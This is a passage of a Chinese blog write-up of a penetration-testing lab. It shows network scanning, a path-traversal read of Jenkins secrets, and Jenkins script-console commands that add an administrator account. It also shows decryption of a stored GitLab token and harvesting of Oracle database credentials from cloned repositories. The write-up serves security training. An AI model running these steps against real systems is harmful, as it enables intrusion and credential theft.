{"id":2787,"date":"2023-10-10T23:42:24","date_gmt":"2023-10-10T15:42:24","guid":{"rendered":"https:\/\/fushuling.com\/?p=2787"},"modified":"2023-10-17T17:53:20","modified_gmt":"2023-10-17T09:53:20","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/10\/10\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Privilege"},"content":{"rendered":"\n<p>\u8003\u70b9:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4fe1\u606f\u6cc4\u9732<\/li>\n\n\n\n<li>Jenkins\u521d\u59cb\u7ba1\u7406\u5458\u5bc6\u7801<\/li>\n\n\n\n<li>jenkins\u540e\u53f0RCE<\/li>\n\n\n\n<li>Gitlab API Token<\/li>\n\n\n\n<li>Oracle RCE<\/li>\n\n\n\n<li>SeRestorePrivilege\u63d0\u6743<\/li>\n\n\n\n<li>SPN<\/li>\n\n\n\n<li>\u5377\u5f71\u62f7\u8d1d\u63d0\u53d6SAM<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan64.exe -h 39.99.158.227\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 39.99.158.227   is alive\n&#91;*] Icmp alive hosts len is: 1\n39.99.158.227:135 open\n39.99.158.227:139 open\n39.99.158.227:3306 open\n39.99.158.227:8080 open\n39.99.158.227:80 open\n&#91;*] alive ports len is: 5\nstart vulscan\n&#91;*] NetInfo:\n&#91;*]39.99.158.227\n   &#91;-&gt;]XR-JENKINS\n   &#91;-&gt;]172.22.14.7\n&#91;*] WebTitle: http:\/\/39.99.158.227:8080 code:403 len:548    title:None\n&#91;*] WebTitle: http:\/\/39.99.158.227      code:200 len:54689  title:XR SHOP\n\u5df2\u5b8c\u6210 5\/5\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 57.8079657s<\/code><\/pre>\n\n\n\n<p>80\u662fXR shop\uff0c8080\u662fjenkins\uff0c80\u8fd9\u4e2a\u662fwordpress\u642d\u7684\uff0c\u626b\u4e86\u4e00\u4e0b\u76ee\u5f55\u53d1\u73b0www.zip\uff0c\u4e0b\u4e0b\u6765\u53d1\u73b0\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"355\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2800\"  sizes=\"auto, (max-width: 977px) 100vw, 977px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$logfile = rawurldecode( $_GET&#91;'logfile'] );\n\/\/ Make sure the file is exist.\nif ( file_exists( $logfile ) ) {\n  \/\/ Get the content and echo it.\n  $text = file_get_contents( $logfile );\n  echo( $text );\n}\nexit;<\/code><\/pre>\n\n\n\n<p>\u8bd5\u4e86\u4e0b\u76f4\u63a5\u8bfbflag\uff0c\u7adf\u7136\u6210\u529f\u4e86\uff0c\u4f30\u8ba1\u8fd9\u662f\u7528phpstudy\u642d\u7684\uff0c\u6743\u9650\u6bd4\u8f83\u9ad8<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227\/tools\/content-log.php?logfile=..\/..\/..\/..\/..\/..\/..\/..\/..\/Users\/Administrator\/flag\/flag01.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-15-1024x191.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-15-1024x191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6839\u636e\u63d0\u793a\u8bfbjenkins\u5bc6\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227\/tools\/content-log.php?logfile=C:\\ProgramData\\Jenkins\\.jenkins\\secrets\\initialAdminPassword<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>510235cf43f14e83b88a9f144199655b<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u767b\u5f55<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/39.99.158.227:8080\/login admin:510235cf43f14e83b88a9f144199655b<\/code><\/pre>\n\n\n\n<p>jenkins\u6709\u4e2a\u5730\u65b9\u53ef\u4ee5\u6267\u884c\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227:8080\/manage\/script<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-3-1024x516.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-3-1024x516.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u6743\u9650\u6bd4\u8f83\u9ad8\uff0c\u76f4\u63a5\u52a0\u7528\u6237rdp\u4e0a\u53bb\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>println \"net user fushuling qwer1234! \/add\".execute().text\nprintln \"net localgroup administrators fushuling \/add\".execute().text<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-3-1024x467.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-3-1024x467.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-3-1024x585.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-3-1024x585.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" style=\"width:840px;height:480px\"\/><\/div><figcaption class=\"wp-element-caption\">\u679c\u7136\u662fphpstudy<\/figcaption><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan64.exe -h 172.22.14.7\/24\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 172.22.14.7     is alive\n(icmp) Target 172.22.14.11    is alive\n(icmp) Target 172.22.14.16    is alive\n(icmp) Target 172.22.14.31    is alive\n(icmp) Target 172.22.14.46    is alive\n&#91;*] Icmp alive hosts len is: 5\n172.22.14.7:445 open\n172.22.14.7:3306 open\n172.22.14.46:139 open\n172.22.14.31:139 open\n172.22.14.11:139 open\n172.22.14.7:139 open\n172.22.14.46:135 open\n172.22.14.31:135 open\n172.22.14.11:135 open\n172.22.14.7:135 open\n172.22.14.31:1521 open\n172.22.14.46:445 open\n172.22.14.31:445 open\n172.22.14.11:445 open\n172.22.14.46:80 open\n172.22.14.16:80 open\n172.22.14.7:80 open\n172.22.14.16:22 open\n172.22.14.7:8080 open\n172.22.14.16:8060 open\n172.22.14.11:88 open\n172.22.14.16:9094 open\n&#91;*] alive ports len is: 22\nstart vulscan\n&#91;*] NetInfo:\n&#91;*]172.22.14.7\n   &#91;-&gt;]XR-JENKINS\n   &#91;-&gt;]172.22.14.7\n&#91;*] NetInfo:\n&#91;*]172.22.14.46\n   &#91;-&gt;]XR-0923\n   &#91;-&gt;]172.22.14.46\n&#91;*] NetInfo:\n&#91;*]172.22.14.11\n   &#91;-&gt;]XR-DC\n   &#91;-&gt;]172.22.14.11\n&#91;*] NetInfo:\n&#91;*]172.22.14.31\n   &#91;-&gt;]XR-ORACLE\n   &#91;-&gt;]172.22.14.31\n&#91;*] NetBios: 172.22.14.11    &#91;+]DC XIAORANG\\XR-DC\n&#91;*] NetBios: 172.22.14.46    XIAORANG\\XR-0923\n&#91;*] NetBios: 172.22.14.31    WORKGROUP\\XR-ORACLE\n&#91;*] WebTitle: http:\/\/172.22.14.7:8080   code:403 len:548    title:None\n&#91;*] WebTitle: http:\/\/172.22.14.16:8060  code:404 len:555    title:404 Not Found\n&#91;*] WebTitle: http:\/\/172.22.14.46       code:200 len:703    title:IIS Windows Server\n&#91;*] WebTitle: http:\/\/172.22.14.16       code:302 len:99     title:None \u8df3\u8f6curl: http:\/\/172.22.14.16\/users\/sign_in\n&#91;*] WebTitle: http:\/\/172.22.14.16\/users\/sign_in code:200 len:34961  title:Sign in \u00b7 GitLab\n&#91;*] WebTitle: http:\/\/172.22.14.7        code:200 len:54603  title:XR SHOP\n&#91;+] http:\/\/172.22.14.7\/www.zip poc-yaml-backup-file<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.14.7 \u672c\u673a\uff0c\u5df2\u6700\u9ad8\u6743\u9650\n172.22.14.46 XR-0923\n172.22.14.11 XR-DC \u57df\u63a7\n172.22.14.31 XR-ORACLE\n172.22.14.16 GitLab<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3a\u9898\u76ee\u91cc\u8bf4\u4e86\u4e2a\u4ec0\u4e48Gitlab API Token\uff0c\u53bb\u7ffb\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>C:\/ProgramData\/Jenkins\/.jenkins\/credentials.xml<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-3-1024x580.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-3-1024x580.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm\/GEobmrmLYh}<\/code><\/pre>\n\n\n\n<p>\u56dejenkins\u90a3\u91cc\u89e3\u5bc6\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>println(hudson.util.Secret.fromString(\"{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm\/GEobmrmLYh}\").getPlainText())<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u660e\u6587<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>glpat-7kD_qLH2PiQv_ywB9hz2<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u7528API\u5217\u51faGitLab\u9879\u76ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains curl --header \"PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2\" \"http:\/\/172.22.14.16\/api\/v4\/projects\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;{\n\t\"id\": 6,\n\t\"description\": null,\n\t\"name\": \"Internal Secret\",\n\t\"name_with_namespace\": \"XRLAB \/ Internal Secret\",\n\t\"path\": \"internal-secret\",\n\t\"path_with_namespace\": \"xrlab\/internal-secret\",\n\t\"created_at\": \"2022-12-25T08:30:12.362Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/internal-secret.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/internal-secret.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/internal-secret\",\n\t\"readme_url\": null,\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T08:30:12.362Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 4,\n\t\"description\": null,\n\t\"name\": \"XRAdmin\",\n\t\"name_with_namespace\": \"XRLAB \/ XRAdmin\",\n\t\"path\": \"xradmin\",\n\t\"path_with_namespace\": \"xrlab\/xradmin\",\n\t\"created_at\": \"2022-12-25T07:48:16.751Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/xradmin.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin\/-\/blob\/main\/README.md\",\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2023-05-30T10:27:31.762Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 3,\n\t\"description\": null,\n\t\"name\": \"Awenode\",\n\t\"name_with_namespace\": \"XRLAB \/ Awenode\",\n\t\"path\": \"awenode\",\n\t\"path_with_namespace\": \"xrlab\/awenode\",\n\t\"created_at\": \"2022-12-25T07:46:43.635Z\",\n\t\"default_branch\": \"master\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/awenode.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode\/-\/blob\/master\/README.md\",\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:46:43.635Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 2,\n\t\"description\": \"Example GitBook site using GitLab Pages: https:\/\/pages.gitlab.io\/gitbook\",\n\t\"name\": \"XRWiki\",\n\t\"name_with_namespace\": \"XRLAB \/ XRWiki\",\n\t\"path\": \"xrwiki\",\n\t\"path_with_namespace\": \"xrlab\/xrwiki\",\n\t\"created_at\": \"2022-12-25T07:44:18.589Z\",\n\t\"default_branch\": \"master\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/xrwiki.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki\/-\/blob\/master\/README.md\",\n\t\"avatar_url\": \"http:\/\/gitlab.xiaorang.lab\/uploads\/-\/system\/project\/avatar\/2\/gitbook.png\",\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:44:18.589Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 1,\n\t\"description\": \"This project is automatically generated and helps monitor this GitLab instance. &#91;Learn more](\/help\/administration\/monitoring\/gitlab_self_monitoring_project\/index).\",\n\t\"name\": \"Monitoring\",\n\t\"name_with_namespace\": \"GitLab Instance \/ Monitoring\",\n\t\"path\": \"Monitoring\",\n\t\"path_with_namespace\": \"gitlab-instance-23352f48\/Monitoring\",\n\t\"created_at\": \"2022-12-25T07:18:20.914Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:gitlab-instance-23352f48\/Monitoring.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/gitlab-instance-23352f48\/Monitoring.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/gitlab-instance-23352f48\/Monitoring\",\n\t\"readme_url\": null,\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:18:20.914Z\",\n\t\"namespace\": {\n\t\t\"id\": 2,\n\t\t\"name\": \"GitLab Instance\",\n\t\t\"path\": \"gitlab-instance-23352f48\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"gitlab-instance-23352f48\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/gitlab-instance-23352f48\"\n\t}\n}]<\/code><\/pre>\n\n\n\n<p>\u514b\u9686\u9879\u76ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/internal-secret.git\ngit clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/xradmin.git\ngit clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/xrwiki.git<\/code><\/pre>\n\n\n\n<p>\u5728xradmin\/ruoyi-admin\/src\/main\/resources\/application-druid.yml\u627e\u5230Oracle\u7684\u8d26\u53f7\u548c\u5bc6\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code># \u6570\u636e\u6e90\u914d\u7f6e\nspring:\n    datasource:\n        type: com.alibaba.druid.pool.DruidDataSource\n        driverClassName: oracle.jdbc.driver.OracleDriver\n        druid:\n            # \u4e3b\u5e93\u6570\u636e\u6e90\n            master:\n                url: jdbc:oracle:thin:@172.22.14.31:1521\/orcl\n                username: xradmin\n                password: fcMyE8t9E4XdsKf\n            # \u4ece\u5e93\u6570\u636e\u6e90\n            slave:\n                # \u4ece\u6570\u636e\u6e90\u5f00\u5173\/\u9ed8\u8ba4\u5173\u95ed\n                enabled: false\n                url: \n                username: \n                password: \n            # \u521d\u59cb\u8fde\u63a5\u6570\n            initialSize: 5\n            # \u6700\u5c0f\u8fde\u63a5\u6c60\u6570\u91cf\n            minIdle: 10\n            # \u6700\u5927\u8fde\u63a5\u6c60\u6570\u91cf\n            maxActive: 20\n            # \u914d\u7f6e\u83b7\u53d6\u8fde\u63a5\u7b49\u5f85\u8d85\u65f6\u7684\u65f6\u95f4\n            maxWait: 60000\n            # \u914d\u7f6e\u95f4\u9694\u591a\u4e45\u624d\u8fdb\u884c\u4e00\u6b21\u68c0\u6d4b\uff0c\u68c0\u6d4b\u9700\u8981\u5173\u95ed\u7684\u7a7a\u95f2\u8fde\u63a5\uff0c\u5355\u4f4d\u662f\u6beb\u79d2\n            timeBetweenEvictionRunsMillis: 60000\n            # \u914d\u7f6e\u4e00\u4e2a\u8fde\u63a5\u5728\u6c60\u4e2d\u6700\u5c0f\u751f\u5b58\u7684\u65f6\u95f4\uff0c\u5355\u4f4d\u662f\u6beb\u79d2\n            minEvictableIdleTimeMillis: 300000\n            # \u914d\u7f6e\u4e00\u4e2a\u8fde\u63a5\u5728\u6c60\u4e2d\u6700\u5927\u751f\u5b58\u7684\u65f6\u95f4\uff0c\u5355\u4f4d\u662f\u6beb\u79d2\n            maxEvictableIdleTimeMillis: 900000\n            # \u914d\u7f6e\u68c0\u6d4b\u8fde\u63a5\u662f\u5426\u6709\u6548\n            validationQuery: SELECT 1 FROM DUAL\n            testWhileIdle: true\n            testOnBorrow: false\n            testOnReturn: false\n            webStatFilter: \n                enabled: true\n            statViewServlet:\n                enabled: true\n                # \u8bbe\u7f6e\u767d\u540d\u5355\uff0c\u4e0d\u586b\u5219\u5141\u8bb8\u6240\u6709\u8bbf\u95ee\n                allow:\n                url-pattern: \/druid\/*\n                # \u63a7\u5236\u53f0\u7ba1\u7406\u7528\u6237\u540d\u548c\u5bc6\u7801\n                login-username: \n                login-password: \n            filter:\n                stat:\n                    enabled: true\n                    # \u6162SQL\u8bb0\u5f55\n                    log-slow-sql: true\n                    slow-sql-millis: 1000\n                    merge-sql: true\n                wall:\n                    config:\n                        multi-statement-allow: true\n<\/code><\/pre>\n\n\n\n<p>\u7528navicat\u8fde\u63a5\u7684\u65f6\u5019\u51fa\u73b0\u4e00\u4e2a\u50bb\u903c\u62a5\u9519<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u53c2\u8003\u8fd9\u4e2a\u535a\u5ba2\u5c31\u80fd\u89e3\u51b3<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/qq_38974638\/article\/details\/115069664\">Oracle ORA-28547:connection to server failed,probable Oracle Net admin 